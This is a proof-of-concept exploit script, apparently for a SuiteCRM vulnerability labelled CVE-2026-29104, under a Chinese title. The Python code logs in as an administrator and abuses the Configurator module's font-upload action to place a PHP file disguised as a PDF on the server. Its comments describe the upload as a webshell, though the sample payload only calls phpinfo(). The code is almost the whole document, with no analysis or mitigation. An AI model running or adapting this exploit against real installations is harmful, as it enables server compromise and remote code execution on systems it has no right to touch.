CVE-2026-29104 SuiteCRM 认证后任意文件上传漏洞

import requests # CVE-2026-29104 Proof of Concept # Description: Authenticated arbitrary file upload in SuiteCRM Configurator module. # Requirement: Administrator credentials. target = "http://localhost/suitecrm" username = "admin" password = "admin" session = requests.Session() # Step 1: Authenticate login_data = { "user_name": username, "user_password": password, "module": "Users", "action": "Login" } print("[*] Attempting to login...") session.post(f"{target}/index.php", data=login_data) # Step 2: Exploit File Upload # The vulnerability allows bypassing file type restrictions in the Configurator module. # Uploading a PHP webshell as a PDF font file. upload_url = f"{target}/index.php?module=Configurator&action=SaveFont" files = { "file_font": ("malicious.php", "<?php phpinfo(); ?>", "application/pdf") } data = { "upload": "true" } print("[*] Uploading malicious file...") response = session.post(upload_url, files=files, data=data) if response.status_code == 200: print("[+] File uploaded successfully. Check server.") else: print("[-] Upload failed.")